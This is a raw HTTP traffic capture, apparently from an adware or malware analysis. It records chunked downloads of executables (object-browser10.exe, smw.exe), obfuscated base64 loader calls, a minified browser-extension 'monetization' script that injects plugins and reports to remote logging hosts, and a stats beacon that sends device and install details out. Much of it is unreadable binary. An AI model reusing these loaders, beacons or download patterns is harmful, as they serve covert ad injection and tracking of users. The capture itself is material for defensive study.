    )T{.K....5...M..v........._.M4tkd...`3..AE.T.....\..o].....C..x.....^.
    .5...........5.F...B..V'.H......._........*H..ax&..YE...I..{s.`)4.

    <<< skipped >>>

    GET /object-browser10.exe HTTP/1.1

    Range: bytes=3000000-3249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d177dk26a4y9jb.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:37:10 GMT
    Last-Modified: Wed, 21 May 2014 12:41:41 GMT
    ETag: "658e80e36d5619ae834a86c6fd34205e"
    Accept-Ranges: bytes
    Server: AmazonS3
    Age: 22302
    Content-Range: bytes 3000000-3249999/5945624
    X-Cache: Hit from cloudfront
    Via: 1.1 cc646cad4582373371b338cfa73dd8a8.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: c92ZJBlYIyZEsviil--mv9s5IR5ej10zx4O17gDuT5RjOh15uV-cEQ==
    [email protected]...$..{.. <}5:.O.......~..$..j.......i.
    j.._Al...q..^. d..t ..<R...)H..........Oj...O.8...[..G>.vE...f..
    ..&w3$..l.;.&....9..`D..l...O;~<K..oh.N....M....-;YZ`....eB.....=./
    ..r..:......'....W.`...B....|.*...i.].S^.....F.(...V6.C........s.T.|0.
    5..n...z\.j.T.=S..F..........;...W1D....E. l.a......T._....v.{....L.$;
    |mK=...O...)....J....$.d.;{.l$..../.(/..8..j....5,\..h.o..X.t.TJ....}r
    w.....Q..[Ip0.h.7.^7!zR<d,......A.ae...cV...u.....Uh.....o....D..:.
    .`>"..:.o.tS..L..NC.,......`....U(0.....d....#.vq]1<}.........LY
    .....(%..:1.c.x...T.$,.~.sb.:.n..p.f..I.m...q.....?M....9..j...@......
    N6#.o.\..x...8..A.......2.<....}R./..A..#..6.U..h..1....Ou...LL....
    ...`.%.E..A..Z......^.. ..aP6..~..*...=.~0B.kk....E R.....u..x..J...#\
    ..T.K...l....<.......-y.....C....fg25..h.........x..f...u.\1......[
    z.cD..X...5v./.)x$...S.,.*...`.H....KvRpC...::.Ns..O.f.N=.......{.Z0.Q
    2y...|..3...q.p)"<..!..cO=*.Y.X9.Y.p.>.idN....l_.W...O.I......3c
    Ho.&.S"....6Ei........>[email protected]#L.6.{..1.-.5..
    ..2...)M...z..*..s.xF.ud.....*[email protected]".C....w.z....b..S9.{a......
    ...4.(..H(&..$..._:S...`..O`.8...d...C0.6...D...-&0....*#....Ry.#6..$.
    ..1.0......4 .WKd....Tj.gU...2Z.......J.z....aWi.;...5........M.5.UW..
    ...'D.W.M.I........}:.._O<.... .....?..t..S^CM.?.y.....v..*@.9.$..X
    *X*..g.H..f....'..)*[email protected] M.......i... .hx_j..f..^...
    .q.f.....pu.rSq[.\......A..l.1...B.s... ....Z~w...[42.......oWS..^>
    ..^....:R.p...x.gb.-ky....../.9..|..N.....UB..m~.E.o..`C.1..."a..e

    <<< skipped >>>

    GET /object-browser10.exe HTTP/1.1

    Range: bytes=3500000-3749999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d177dk26a4y9jb.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:37:10 GMT
    Last-Modified: Wed, 21 May 2014 12:41:41 GMT
    ETag: "658e80e36d5619ae834a86c6fd34205e"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 3500000-3749999/5945624
    Age: 22305
    X-Cache: Hit from cloudfront
    Via: 1.1 cc646cad4582373371b338cfa73dd8a8.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: Xy5j_iC4h_FKvf2NNoXOOUrLPgeFGztQB_1nwqu5S7kX9i92StD5EQ==
    Q...M{..gg.]kBjsU.-Yg.........7.L_8.l...._..w..58..?...D..!.wd..._...~
    .....#..=.]......0/slk.i6.*..4.......W..ex"..?.}I..9X#6s..~...Xj.yr[..
    ....5._Hs..I...d>..j......or..3>..........T..N.$.... Q.......O..
    dq..AE.NUn>.t.o....{..^...6.yR)8u....jR..O..u.....q.K.....Y D2.....
    ......#E....../.j..8...>....8m&.z)..W..67...".....j......a.auz...\.
    ......Q....GD0uN..[&knZr.....w.S5....."...K.m.&.......5u..O..!..I.x.=.
    h..........x\l9...D.J..>....V.........Sc...%.........d^......0.:...
    .....)[email protected]....,.$...Pv>r..j[=..........G~.X........
    ...S#X.W.H.}.}....#...Z../..*.FmZ.[..`.j.......W..e.......$.Kg...%.|..
    |.....P=D.}r.....-.L..:..?.>.....r.K....!tJ.u...~..Ul...0.@........
    ..>(.7 .... ..S/;....../%........F'..gbb,}[.=.|..\..M...|....[...6z
    ..../:V..$.n.E..G..c...BU.....R..B...l.....}..I#<...T5,......].P..2
    ._B8...qi..v....[r.92_.g^....}.Fi;...X...y.n..2|*.I..:...x..... .FH.`u
    W.......Hd..x>....n.E#....}[email protected]..,>`.. ..ki....\Mr;.-r..3G/.
    .....h.<..97. ...u..,&"...\a.A.*....K.".....1..F*.'.i.0.(.9..4....k
    ....v&...C...s..;..L<....F4.:$.b..nFm_.......1.X..6...c."R[n..1.O@.
    E.......yP.;8.*.0.v.?.......6.F...P.X....RqU.O..%?.."|....DE..".iG..pX
    ......cY.......=]-......a..4..........|x..u......J9Z..b`MX.FZ.tN.y.k..
    "..c..........JC..4Sg.m..K.....{)...DS....[..b.$].ZhZ_...l......F..Me.
    6f..q.....S......_`.&f.m.Ft..._:$4@.#X........&.......o%K&.S:z.r. cVW"
    ....2C$L].....P^.S".4.k....l.V...z........X..E...8....N...uC^.kw..6J.I
    .......n."...=..h...^.rY.....!=.0[|.Avl..at..8.QG.2w.>....A..w.

    <<< skipped >>>

    GET /object-browser10.exe HTTP/1.1

    Range: bytes=3750000-3999999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d177dk26a4y9jb.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:37:10 GMT
    Last-Modified: Wed, 21 May 2014 12:41:41 GMT
    ETag: "658e80e36d5619ae834a86c6fd34205e"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 3750000-3999999/5945624
    Age: 22308
    X-Cache: Hit from cloudfront
    Via: 1.1 cc646cad4582373371b338cfa73dd8a8.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: q49qC_gPbGFwk_dEcwFimtryNfY-xOf_Xnz4CCyVAXGWtkbBuelSLg==
    e!.F.....:a...  .....CIT.z3.;..nQW.S]...?b."..bo......G...Y.*..h.3....
    6.H..>0C..E..Y.<&;..3l...!Hk.....%4.E.3.......U.E....%...xI.."T.
    .c'.....(.\..E.o.?.~.....}n.7..g?.Rl.X.D [email protected].....&.E!7=IN..|.z.
    ...>@....K..........S.U._.Ib.....Dz.w..o..|..0../a -..*.Ru9/....L.*
    V)....M5....0I.....;.i9..9.C..].OL&8.1.".}...#..G kYwCi.........O.R...
    `..6..m&.|M..........(.#.........Y`..n.= .:.OI...2....H....7F...G..&..
    ....A...T.9..\.8N..IJJ..G...........H......d..D...M...wr.r\.....U....#
    ..ty...`.[.Wd..bN..~..6.D....~ ...S.f......6.B5s.XqK....D)W...%..G..BU
    y....!..E.Q..w......{.......y|....jL...\..........%=0.s...R.*.........
    ........F...J.EK.v.[XcW}"...q....aTf&y..,.zk..x...U.E.Z~...&Y; &..{H.U
    ...r..^c...D)........R.qG.[.qP&X....[.#..|:^8.Qu|&.@...,=-.h|t.p....z.
    `.....s7M..;2...D...=.Ai.Zc...&U.g.B.KdQ...3i~/.PGI2....?.T..nf..2....
    .0.8..o..'..pLl......u.t..$y..,V.../q{..*m.#.:.~.\......Xjxh...r.k...3
    .....dU.....?.........;'V..O..z00Z) ...-....nfe...R....(...BM.I.4.....
    C.kXy.7AS6b...1L_.].:..6.I;..O...L....Tp..75:s5.t ..hj......W.........
    .^Z.1.;?.e%[...28!..j..`oq?"....t.....2...........m/...D~2G1..........
    .. ._...i...6......bD..B...].....#C:.Q..........f..q...b.s."..?..I&..d
    ..x$.....`.i.q....Q...@Pp.$.V>;...W...wFn...F.!.'.e;s8..........X$.
    .?......f .v......z.C$w.....h..e..V...F[...<......[...".W....$...,.
    0.Tp@[email protected][email protected]....]....FEA.3..L.....
    ....!([email protected]...<1G!.r.....'.I....cS....&.>k._q>.i...... . j^f
    ...I....P....2.t.3 n.L..Or}.%.....a]....n2.X..'.&.8l._....;8R.^S..

    <<< skipped >>>

    GET /object-browser10.exe HTTP/1.1

    Range: bytes=4250000-4499999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d177dk26a4y9jb.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:37:10 GMT
    Last-Modified: Wed, 21 May 2014 12:41:41 GMT
    ETag: "658e80e36d5619ae834a86c6fd34205e"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 4250000-4499999/5945624
    Age: 22312
    X-Cache: Hit from cloudfront
    Via: 1.1 cc646cad4582373371b338cfa73dd8a8.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: OnmC4UfrV9sxY-t8UJAWgsoAAAMF_QsE207kKZAKlglQZPXrqt7g5w==
    ...5.^...u.ok\..@. zq.....D........].........`.a....b.....X..L.>...
    ..p..f..{.*.......n.#[email protected]... .lR.. ..RHCM..V...._X..-....c..
    ...3u...MpQ2g..TY...E..c...I.t...>0.P.]SD..............,.&.!q......
    .I.C....2g..d..../.).;....c...".......KP,....4x$.f.......K.^r........k
    .>p .2..).^....s...U........X..w].G...HF...q....s......C.6.RQ..xl..
    ..,....5I0...n.,...!^.........F.GO#.S.c..Uu.`..KS...So...:.XMlI..cP...
    e..t.Z.......\.E. ...d,..0.`.r.O.JN. .v.d..T..e.nJ,.\...'.Q&9.bL...U()
    .m?o3.V.....}^q|.n.....>Y3.K..b.-.D).}e....p......rU.0d...<.?...
    .....;.V....D..... ..f.\K.P^g]..C.c.7.Ut....... ...-:......N.C(D..h.a:
    k..2..B.Z^...S..g.I.0..Ol..e*...~V...>..MT.M....CO.._.....jy.sY..&l
    t;...k...'6."...eNe'[email protected].!V.a..d....c.../.......G...H.vb......6O.q.H
    ...C...1.2...Z....I.(.ak...=.I.B3..u..[..YT.f..E....9........7....E...
    D.....x.......~..p.q(....c....|EE'...sG.y.......4.X\$...ly0.|.>..#.
    ...S.-..I......q...).l.&<.7A.(..<..N,...Q`zql.m4.n..e<....A.3
    ..F]dg{.............._.)V....>{.v..\..1.a....^ ....@.^.Xd..|....$..
    l..7..M..........g..^......)$M#.=*K4{Y.........>YY&..`.U.......U.n.
    .!...=,]..FGr.6.....i#^....7..Frw...gv..Z..L:..7...^..U.....z.........
    .,....P.....\..h.0ci.C...,...$...|&.....7.E.b&.........G.b.....q9p%b..
    ...8..0..[{P.V?.}.s..pjo...sy..._wM...j...jI.'..Sb..4)r}.......>...
    ..:;......K4h5j.e...._.J............x...%.G3...@..,.UO..m......"....(.
    .6H........@/t.`.9M>..N.h~9.............O..d....Sw......g/..... [K.
    ..Qg..*.aR...8..2..e...i...j.?.m......B.>RV.....0Gb1..V*..L.'..

    <<< skipped >>>

    GET /object-browser10.exe HTTP/1.1

    Range: bytes=4750000-4999999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d177dk26a4y9jb.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:37:10 GMT
    Last-Modified: Wed, 21 May 2014 12:41:41 GMT
    ETag: "658e80e36d5619ae834a86c6fd34205e"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 4750000-4999999/5945624
    Age: 22315
    X-Cache: Hit from cloudfront
    Via: 1.1 cc646cad4582373371b338cfa73dd8a8.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: Prm3rlp1GBtRd6FFIqCemHS6oIGvN7_JYpQ4FagHAre25ffPSFaFpg==
    ....9...O..!.I)..K.!V..6.7...............a......B.R.....)..1....m.]...
    8...... ..RM........e..o...............,4l.......bf.J..OC.$vKo.C._L..a
    ...&A&...8.4......&..?.3".b....\..[Y/K........C.cQ..DT,.M.Q..o.....5..
    ._!...bp.u.....\..V...4.$..G...b....{B..M.E....#mV.h.....HJ....B.=.v..
    .*{.ecS...g%J..~.."..W.....6.4....3%X.i.k.fF...-,...=. .e.r..`..RZ0..:
    ...F&...j....l.a.. D..l..=z..0..!.........[L......../[email protected]......
    6.E.c3...M.^J..&..d...V.$@.......#..........j.6'..B......z.\[email protected]...
    .R..'..FP.@.....%..."....^{....?6.....>..`.., ..Uw..T........dF..N
    x.Z....n.E....8...M>b6V.....8.ANf...n*[email protected].!./...o....?..-...
    ................C.w(Zn...A..4Pr:.1..L.....h.a...~.........KQP#.=..b...
    Z......E........Fs..!..../1N}...\..7.^.;.%R....$V..O\..,d...Z...cj.*..
    ..!....7...L...:.m(jD....V?7... ..>..k..4..M`..j/....y....W.. "h...
    ..s.s.9>..y.;....YLor./8...q...)..W.>.......N.....'.o$.}..S....3
    p..Fp9.:..<......ir...f|.eEi....?.<.O5.4.bN.i.........a...u..z..
    PN]...o...mi....R........{).{..{...V.f.U....4.F.(......rJ.....)....|..
    [email protected]{Vl....._...)@mw...G...B..[...&......(L}..
    O0..v..vX..V...CR......4..o..1......v'.,H...HF..[.Rc.m..X.cW.Y%X..n.R*
    u~d.q..~..)O>..8..S^.!..1........N\q)..T5...... ...)w...w.F....tM..
    ..........O.....z.....9..!....[.EX\i._.....r....".N..!..y..N...k.;....
    o.I...!O...P....L({..9n.y.........T....W...J.....~_..x.1..'r.4.w...{.K
    h2..."...7........]..8.0h'^;<..to...%.....T.k,..4.N&.......sm... #?
    .7.,.$....[.yZ..^....@Tv.......~b..\..Zo3.Gt$...%3...k.....'.....:

    <<< skipped >>>

    GET /object-browser10.exe HTTP/1.1

    Range: bytes=5250000-5499999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d177dk26a4y9jb.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:37:10 GMT
    Last-Modified: Wed, 21 May 2014 12:41:41 GMT
    ETag: "658e80e36d5619ae834a86c6fd34205e"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 5250000-5499999/5945624
    Age: 22317
    X-Cache: Hit from cloudfront
    Via: 1.1 cc646cad4582373371b338cfa73dd8a8.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: 8v6Kf2ghbb9XTSDAehSSM415sioscULWnPJPNZFfEDjLclgljZGnIg==
    ...#O...,].a.........q....2J.[. .dSZv\8,....:...^Z".....h:.*.......;..
    [.X.......I.X.....=o.8.4..."z...~/@.1N6..q.........u.g.....h?..7....5L
    .>..e..f...J.I...97&.S|~.XQ."...J.w...'....h..d.(..O.ea:.#...]w..bO
    #[...|..~....e.a..{..l5r.)F....8.$...L.*u....M..?..\m.s.~.....a.,q..c.
    .=.. .k. ..s...Dn....]8..EKN.................S.]%V.O"...(_;.t.4^....X.
    ..B3r*r..dF.[.4..Kyk...J.~..:W7....A.....W....w.qh.Z..j.i../$C1y..^H..
    .T./g{..Kjs...B,.`O.A..::Q'.bk.4.Fs ..I.`.s.Xr..t..$p....#....F*......
    .&%...y.j..p.....=B.. .1K..k.J.......5w..3.f.'`L0........at......43.&g
    t;..........y..|.$G .).RNE..q..F....S..;....o...C@%f&..3..>...==...
    .H.h3.y..5....N[.A`.V.0.g..eU..p......5..y4.%....`..ul.MLI......TG.kR.
    .O^_gur..../...V-.h<.....k5.@.|[email protected]<.8.[..d.m..
    [email protected].......&..9..\.qr....GL..)......e.;..B.f.......{...K...\...o.
    R.......c:[email protected].......
    .=.4.asd......#....i....I.q..j.L........I.xpk....<N.XF..H.CG.f.-..4
    .V.B...<[o..>'....O...L15m?do..2..8.p....FO...f..[...d........A.
    .....p...D...0..GT...?..a&0Mz....g.1p..am....L..~.XmD..r.@2n}.D.....
    .....H.,.n....j.w.&..[..."V-...J.D...S../...x2 ........8.a..5(...t.2.h
    .:.....1.V.8aK....}...{.!..%D\.a..Y.^..h.......a..s..p/..X..>..F.V.
    ......>.....Lv.NL..j.G..r.]$.?O'[email protected].."..j3a....9..\ zY..5..=...
    ..S....O......||....x....S0...].B.u....'c.i...4..SH..-s.....J..l......
    t..KK..T..M.\.A..!?v.......t.)..p@I. ....-F..T.D...{..i...J..:....:..e
    _eSt..j......1b......_e.r..6.7..k.8}..$.?&w%L6..B.|.#..K...\.r&..Y

    <<< skipped >>>

    GET /object-browser10.exe HTTP/1.1

    Range: bytes=5750000-5945623
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d177dk26a4y9jb.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 195624
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:37:10 GMT
    Last-Modified: Wed, 21 May 2014 12:41:41 GMT
    ETag: "658e80e36d5619ae834a86c6fd34205e"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 5750000-5945623/5945624
    Age: 22320
    X-Cache: Hit from cloudfront
    Via: 1.1 cc646cad4582373371b338cfa73dd8a8.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: 4uj0qlLKj9Zs5HEqDZL_XxYv8zpt7qumHsM6Cv9aD_IruD35e_cmDg==
    ..gr"P.`3)......H.>.3".>........ziP....,.0../.@.>...) X.&.q.t
    w....|..1...\mO...J....a........V.....!......i1a7.s.%.A......].... ...
    .'...?^.."ze..k..E......(<.....q..(....H[........5.v..!.v....{...y.
    ..)[email protected].\.C54....d.E....d[&8.8..4.Jgp.2.w....|...9Xe.i...R..UI)/...
    fg....)..Fn`.4..;..T$ .Eq.......L..SQ.H<-QHy.'..V...L.sd...o..Z...X
    .J....B..=....j.....T....B.J...{jz.<.n.dZpR.s...A........hMaV......
    D#...4>"T(..sq]L...n.i.(.Y ..Y..x.&.Z1...Q.v...6Y .\.....'[Iw..f...
    .C~.v.t.n&.t..8.......8#......,_%...@c{*[email protected]..(.~4xU.U."c...p..Am....
    $...f.Q.">y.S.LJ.*..c<..0...........,.a..V.4.T$hF7)..O.\^...Neb.
    ....;H\R#tt....(.GH.d..I...J.MP.P...(....>....w....^.Sb/.P~m.sT..3"
    .8{...}68|*.m.v....KlU.F........7....@~6..s..$.e.-..DQ....2.T.........
    K.~N.:..R........... HIk.*!.@....>y.8.I......%I....Q....&=..>.Z.
    ...lQ...}..7....T....WD.....=.W...BA.<..,.......l..v.C.Ekuz...;d_..
    .jyk...a.ADI......x.H....Bea?..v..V...b.R.8<.1.E..&........-.7._.I.
    .w.[K?.....s....g{..........Gy...6....Z.*M...... _e.J.......x.]..V|d.o
    ...a......&b..`......ga....l......X.bQ.u.k..6`R..N....}.o.e...|w=.z@..
    .....z..>.7;...m.Q..pa5.....^..B.Q8.k.?.]..NA ..&(nO...-Oe..u...O..
    ....p........*5^%/.>..<...:].F}., .B.........E.t.`..U...'".Q,...
    .$R..&=I.X#...u....z.E."?.....e^.P.c...Lf.?(.jH%R..4x.. ...Py.g..q.)..
    ....Me...g...n.... ..f|R(/......"....x.H4_u...o.1..(..*.7.....6.g...P.
    Z..e....V.rp.}..$.......U.Ugk~..o...'.l...n.WW...uG..W7.^...uL*/(.T...
    .8~..Sz.T-Vs7.7....{..$.....6x>.e.Dik.....&.j...u#Q........d...

    <<< skipped >>>

    GET /plugins/mins/monetization/geo/ciuvo_m.js?ver=5&rnd=41 HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:36 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1401904989"
    Last-Modified: Wed, 04 Jun 2014 18:03:09 GMT
    Cache-Control: max-age=692
    Content-Length: 1151
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1401908136.dop012.am4.t,1401908136.cds020.am4.c
    if (typeof setup2 === 'function') { setup2('MTk3MDY4NTEwZjEyMDQxOTMzMD
    IwZTU4NWI1MzQ1MGUwNDFkMTY0YTRkNTUxMjA3MDYxMjE5MGE0ODEzMGIwZjE3MWM0OTA1
    MWYwNDQ5MWQwNzFlMDgxMjQ4MTUxNDAyNDkwMDEwMTMwMjE2MTQxNjExMWIxNDFmMTU1Nz
    UwNWQ1MzQ4MWQwMDA4NWUwODA5NDM1ZjZkNmY1MjAxMTIwNDEyMDkzNDAxMGI0NDRhNDk0
    NDE4MTYwZTExMDA1ZDQ5NWYxYTAzMTMxNzA4MDQ1ZDA0MGYwNTFmMDk1ZTAxMTUwYzVjMG
    EwMzE0MDAwNzVmMTExZTBhNWMxNzE0MTkwYTAzMDMxMjFiMTMwMTA4MTE1ZDU4NDg0NDRj
    MTcwODFkNDkwYzAzNGI0YTdhNmI1ODExMWYxMjAxMTkwNzJmMTQ0MDQwNDE0MjVlNTc1Yz
    YzNDY1MDQyNWE0MzA1MDIxNDA0MDAwNTExMGU1ODViNTMzYzQ0MDMwMTA5MDAxMjEzMGYx
    NDQ1M2I1YzYzNDY1MDQyNWE0MzFhMDkwYTE5MDcwMzNhMzE1ODViNTM0NTBmMTY0OTRlMD
    QxYjBhMDQxYzAxNDYwNzAwMDgxNDBkMGQ0ZjJjMDQwZjA1MWYwOTAwMTAxZjA3MDA0NzVi
    NGQ1NDQ2NTcxNzE0MDUxNjAxMGYxZTBjMDI1NzRiNWExNjFhMDkwMjFmMWU0ODJmMDExMz
    E0MDUwODE2MDIwYzAwMDM0MjQ3NDEwODFhNWQ1MDQ5MTExOTBjMWUwZTA0NDkzOTEzMDAx
    MzA2MGQwYTEzMTYwMTE1NWUxOTE0MTkwMTFmMTIwMzA2MTQwMjA2MTE1MDVmNWExYTU0MD
    QwNzFkMTkwNzE5MDUxNDQ2NDk0NzQxMTMxYjA5MDMxMTA4MDgxNzAyMTQyZjM2MjUyMjJk
    MjkzMjIxMmUyMjM1M2IzOTIzMzczODNlM2EyMzM5MmY0ZTRhNTA0NTBmMTQxYTAzNDE0YT
    Q5NDEyZjNkMzkzMzNjMzQzNTIyMjAyMjM1MzAyNTM0MjAyMjM0MmYyMDIyMmYzZDVkMWM0
    ODQ1NmMwZA==', 'bzasgfpifp'); }
    ....



    GET /plugins/mins/monetization/monetizationLoader.js?ver=50&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:36 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1401728669"
    Last-Modified: Mon, 02 Jun 2014 17:04:29 GMT
    Cache-Control: max-age=745
    Content-Length: 156130
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1401908136.dop012.am4.t,1401908136.cds020.am4.c
    (function(t){var v="06-01";if(!appAPI.isBackground&&appAPI.dom&&appAPI
    .dom.isIframe()){return;}var F=appAPI.utils.MD5;if(!F||!F.encode){F={}
    ;F.encode=function(M){return M;};}if(typeof appAPI.internal.monetizati
    on==="undefined"){appAPI.internal.monetization={};}var J=appAPI.utils;
    var w={DBNamespace:"monetization_plugin_",RULS_JSON_NAMESPACE:" rules_
    ",MONETIZATION_PLUGINS_IDS:"monetization_plugins_ids",IS_INSTALL_REPOR
    TED:"is_install_reported_",STATS_NAMESPACE:"stats_",PLUGINS_VERSION:"p
    lugins_version_",GEO_URL:"hXXp://ipgeoapi.com/",BASE_DATE:new Date(201
    3,0,1),updateInterval:1000*60*60*6,rulesJsonHostUrl:"hXXp://app.datade
    moserv.com/monetization_campaigns/",statsHostUrl:"hXXp://logs.datademo
    serv.com/monetization.gif?",errorHostUrl:"hXXp://errors.datademoserv.c
    om/monetization-error.gif?",countryName:"",reportQueryString:"",subID:
    "000000000000000000",reportEvents:{installEventId:0,dailyEventId:1,ver
    tical:2,runningPlugins:6,installVertical:13,impressionsEventId:31,newA
    llowedVertical:32,policyAppDefualtInstallEventId:50,policyAppDefualtDa
    ilyEventId:51},MIN_PAGE_VIEW:(appAPI&&appAPI.internal&&appAPI.internal
    .isNova?-1:50),MAX_IMPRESSIONS_TO_SEND_IN_PING:200,MAX_PAGE_VIEWS_TO_I
    NJECT_BI_PIXEL:200,PAGE_VIEW:"monetization_page_view",pageViewCount:0,
    PLUGINS_DELAY:"monetization_plugins_delay",installationTime:appAPI.ins
    taller.getUnixTime()*1000,hoursToMilisec:60*60*1000,DEFUALT_SOURCE_ID:
    0,categories:{"1":["d908e50170d7cb46a92fdbff0d73bb5d","0a64c81275732dc
    f0eb51fc0fdecfaa7","edb18644366c10cc24c58f6fb14ca9f4","15e39ed909a

    <<< skipped >>>

    GET /plugins/mins/monetization/geo/superfish_no_coupons_m.js?ver=11&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:36 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1401904989"
    Last-Modified: Wed, 04 Jun 2014 18:03:09 GMT
    Cache-Control: max-age=344
    Content-Length: 759
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1401908136.dop012.am4.t,1401908136.cds020.am4.c
    if (typeof setup2 === 'function') { setup2('MDM2OTY3NTAxZDAzMGUwYTNkMT
    YxNDQxNTQ1MjU3MWYwZTBlMTg1ZTU3NGMxOTA1MDI1OTA5MGYxODAxMGEwNTA3MDExZDU5
    MTkxNTA1NGIwZjEwNDEwMTEzMjgxNzFiMDEwYTU2MDkxZDAyNGExMzE2MDkwNzExMGEwMD
    BiNGYxZDFmMGMwMDA1MGQxMzE0NDgwNzA2MTIwODMzMGM1OTE5MDEwZDU0MzYyMzMzM2U1
    NTNiMjcyMDNjM2QyNjI0MjgzMzJjMjEyYTNjMmIyYTIxMzIzNDNlMmQyMDI3MzAzYjMwMm
    EzZTNlMjUzNzQ2NTQ2OTY3NTAxZDAzMGUwYTFiMzEwYTBmNGM0ODU1NTUxMjBlMWMxNDBi
    NTk0MTVkMDIwMDBkNTQxYjExMDgwNjFjMTQxYzA0MTI1NDBiMGIxNTRjMTkwMTVhMDQxYz
    I1MDUwNTExMGQ0MDE4MDYwNzQ1MWUwNDE3MTcxNjFjMTExMDRhMTIxMjFlMWUxNTBhMDUw
    NTUzMDIwOTFmMWEyZDFjNWUwZjEwMTY1MTM5MmUyMTIwNDUzYzMxMzEyNzM4MjkyOTNhMm
    QzYzI2M2MyZDMwMmYyZTNmMjYyMDNkMjczMTIxMjAzNTI1MzMyYzNiMjc0MTQyNzg3YzU1
    MGExNjFkMDMxMTBkMjcxNjU3NGQ1YTQzNWI2ZTA1', 'xcnruwzzhd'); }..


    GET /stats.gif?action=daily&app=32850&bic=7F1D95218D1E4CF487AAD4B2A3E48467IE&ibic=7F1D95218D1E4CF487AAD4B2A3E48467IE&verifier=1121c510e5f38d154df47b19458d540e&ver=1_34_05_12&installtime=1401908094&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=000046&campaign=000046&subid=default_subid&zdata=default_zdata&ieprofiles=1&chprofiles=0&ffprofiles=0&runfrom=installer&appver=197&bgver=1&pluginsver=161&curtime=1401908094&lifetime=0&rnd=8734 HTTP/1.1
    Accept: */*
    Host: stats.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: Ic1rJCXXqXY671EdsrEra8RvSgfxMv2o4UxoH7LbbTSUVBAb/lj5PvecQbk5DSsrNw5i3sJUK08=
    x-amz-request-id: D27987AD0792EA5E
    Date: Wed, 04 Jun 2014 18:55:20 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Mon, 24 Feb 2014 23:57:07 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;..


    GET /smw.exe HTTP/1.1
    Range: bytes=0-249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d13s98z2lzti92.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Last-Modified: Tue, 27 May 2014 14:13:42 GMT
    Accept-Ranges: bytes
    ETag: "6c8a3addb579cf1:0"
    Server: Microsoft-IIS/7.5
    X-Powered-By: ASP.NET
    Date: Tue, 27 May 2014 23:32:52 GMT
    Content-Range: bytes 0-249999/5194096
